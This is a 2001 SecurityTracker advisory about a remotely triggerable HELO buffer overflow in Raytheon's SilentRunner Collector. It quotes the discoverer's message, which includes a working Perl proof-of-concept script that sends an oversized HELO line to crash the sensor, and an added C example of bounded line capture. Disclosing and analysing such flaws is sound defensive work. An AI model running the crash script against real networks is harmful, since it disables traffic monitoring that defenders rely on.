SecurityTracker.com
Category:   Application (Security)  >   SilentRunner
Vendors:   Raytheon
Raytheon's SilentRunner Networking Monitor Can Be Crashed Remotely
SecurityTracker Alert ID:  1001202
SecurityTracker URL:  http://securitytracker.com/id/1001202
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 30 2001
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): v1.6.1, possibly others
Description:   Raytheon's SilentRunner threat visualization tool reportedly contains a vulnerability that allows an attacker to crash the application by using a malformed SMTP e-mail command.

The SilentRunner Collector (SRC) component of SilentRunner has a buffer overflow condition in its parsing of sniffed SMTP traffic. The overflow occurs when the SRC is monitoring an SMTP session where an SMTP "HELO" command contains in excess of 4096 bytes.

Impact:   A remote user can send SMTP traffic across a monitored network segment to crash the SilentRunner Collector and stop the product from monitoring network traffic.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.silentrunner.com/
Cause:   Boundary error

Message History:   None.
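
A bounded capture of a sniffed HELO line, as an added example: this is not SilentRunner's code and not part of the original advisory or message. The function names, the status enum and the 4096-byte buffer size are assumptions for illustration; an oversized or unterminated line is truncated and flagged instead of being copied past the end of the buffer.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define HELO_BUF 4096  /* assumed capture-buffer size, from the advisory's 4096-byte threshold */

enum helo_status { HELO_NONE = 0, HELO_OK = 1, HELO_OVERSIZED = 2 };

/* Case-insensitive test for a "HELO " or "EHLO " verb at the start of data. */
static int is_helo(const unsigned char *data, size_t len)
{
    static const char verbs[2][6] = { "HELO ", "EHLO " };
    if (len < 5)
        return 0;
    for (int v = 0; v < 2; v++) {
        int i = 0;
        while (i < 5 && toupper(data[i]) == verbs[v][i])
            i++;
        if (i == 5)
            return 1;
    }
    return 0;
}

/* Copy one sniffed HELO/EHLO line into out[outsz], always NUL-terminated.
 * data/len is reassembled client payload: untrusted, possibly missing CRLF.
 * The unchecked form of this copy, memcpy(out, data, line_len), is the
 * boundary-error class the advisory names. */
enum helo_status capture_helo(const unsigned char *data, size_t len,
                              char *out, size_t outsz)
{
    size_t line_len = 0, n;

    if (out == NULL || outsz == 0)
        return HELO_NONE;
    out[0] = '\0';
    if (data == NULL || !is_helo(data, len))
        return HELO_NONE;

    /* The line ends at CR, LF, or the end of the captured bytes. */
    while (line_len < len && data[line_len] != '\r' && data[line_len] != '\n')
        line_len++;

    /* Clamp to the buffer, keeping one byte for the terminator. */
    n = line_len < outsz ? line_len : outsz - 1;
    memcpy(out, data, n);
    out[n] = '\0';
    return line_len < outsz ? HELO_OK : HELO_OVERSIZED;
}
```

A collector built this way can log HELO_OVERSIZED as an event of interest and keep monitoring.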


 Source Message Contents

Subject:  Silent Runner Collector - HELO buffer overflow vulnerability


Hello,

Silent Runner Collector (SRC) has a buffer overflow condition in the
routines that parse SMTP traffic.  SRC is the "sniffer" component of
the Silent Runner network traffic analysis suite.  The overflow was
noticed in SRC v1.6.1 but is likely present in other versions as well.
The actual buffer in question holds the SMTP HELO line.  The overflow
occurs when a HELO command in excess of 4096 bytes transits a network
segment that the collector is monitoring.  This vulnerability can be
exploited by an intruder to crash the collector and thus stop the
monitoring of transiting network traffic.  I'm not sure if this bug can
be exploited in such a way as to allow for the execution of code on the
sensor.  Maybe someone else has some insight into the possibilities for
arbitrary code execution?

Jack



#!/usr/bin/perl
# This is a simple script that demonstrates the
# SRC HELO overflow vulnerability.  It will result
# in a crashed silent runner collector so please do
# not use it on production networks.  It is intended
# for demonstration purposes only.

use IO::Socket;

$remote_host = '192.168.111.3';
$remote_port = 25;

$buf = 'A' x 4092;

$socket = IO::Socket::INET->new(PeerAddr => $remote_host,
                                PeerPort => $remote_port,
                                Proto    => "tcp",
                                Type     => SOCK_STREAM)
    or die "Can't connect to $remote_host:$remote_port : $@\n";

# 'HELO ' + $buf  = 4097 bytes ( 1 byte too much)
print $socket "HELO $buf";

exit;

 
 



Copyright 2021, SecurityGlobal.net LLC